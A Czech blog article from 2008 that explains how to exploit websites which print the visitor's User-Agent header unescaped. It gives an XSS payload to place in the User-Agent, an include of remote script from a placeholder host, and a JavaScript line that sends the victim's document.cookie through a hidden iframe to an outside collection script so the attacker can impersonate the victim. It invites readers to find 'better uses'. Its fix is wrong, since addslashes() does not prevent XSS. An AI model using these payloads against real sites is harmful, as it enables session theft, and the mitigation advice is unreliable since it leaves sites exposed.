Zpět na seznam článků     Číst komentáře (6)     Verze pro tisk

Nejrožšířenější internetové chyby - III.

Autor: Genua_   
6.2.2008

Jedna z mnoha chyb, kterou můžete potkat volně na internetu


Touto chybou jsem se inspiroval na jednom nejmenovaném webu, kde vypisovali jméno prohlížeče. Jedná se téměř o normální záležitost, mnoho webů podobné informace vypisuje, tak proč by to tedy mělo být nebezpečné?
V PHP existuje proměnná, která se naplní jménem prohížeče. Tato proměnná se jmenuje $_SERVER['USER_AGENT']. Tato proměnná nám vypíše jméno prohlížeče, ovšem, my uživatelé dovedeme tuto proměnnou měnit. Pokud máme nějáký kvalitní prohlížeč (Internet Explorer za kvalitní nepovažuji), tak jsme schopni díky různých plnění měnit tyto proměnné pouhým kliknutím. Teď, když už víme, že můžeme měnit toto pole, jak toho využít? Můžeme vepsat například ahoj,
v tom případě se nám vypíše místo našeho prohlížeče text ahoj. Můžeme, ale napsat i něco pro náš prospěch. Ovšem to, že můžeme vypsat cokoli nic neznamená. Vstup by musel být naprosto nekontrolovaný.

Pokud tedy nastavíme našeho user_agenta na
<script>alert("Hello")</script>,
tak se nám zobrazí upozornění s textem Hello. V tom případě jsme již za vodou a můžeme dělat téměř cokoli. Protože jméno USER_AGENTA je omezené, tak musíme inkludovat skript odjinud:
<script src="http://cokoli.net/skript.js">
jedinou možnou překážkou tedy je kontrolovaný vstup, pokud tedy máte na svým webu podobné informace, tak se přesvědčete, že máte alespoň funkci addslashes(),
která přidá zpětný lomítko před všechny nebezpečné znaky.

Dejme tomu, že už máte web s podobnou chybou, jak toho využít? Můžeme požít více věcí, ale nejúčinnější bude asi chytat soubory cookies, za které se později můžeme vydávat. Jak toho docílit? Tento JS kód vepište do souboru, který spustíte:

document.write("<iframe height=0 width=0 src=http://www.cokoli.cz/js.php?cookie="+document.cookie.replace('#', '.').replace('?', '.')+"></iframe>")

Pak si nachystáte skript třeba v php, který bude ukládat tyto informace do db, nebo souboru. Tak to byla malá ukázka, ale myslím, že rozhodně najdete lepší využití.

Pokud máte tedy prohlížeč Firefox, tak si můžete stáhnout rožšíření na editaci USER_AGENT zde [link].
Otevře se vám okno na instalaci nového rožšíření. Nainstalujete, restartujete Firefox, a pak můžete plně využívat jeho funkcí.

Tento článek byl velice konkrétní na jednu jedinou chybu, která přesto bývá kámenem úrazu na mnoha webech.

Líbil se Vám článek?
Budeme potěšeni, pokud vás zaujme také reklamní nabídka

Social Bookmarking

     





Hodnocení/Hlasovalo: 2/2

1  2  3  4  5    
(známkování jako ve škole)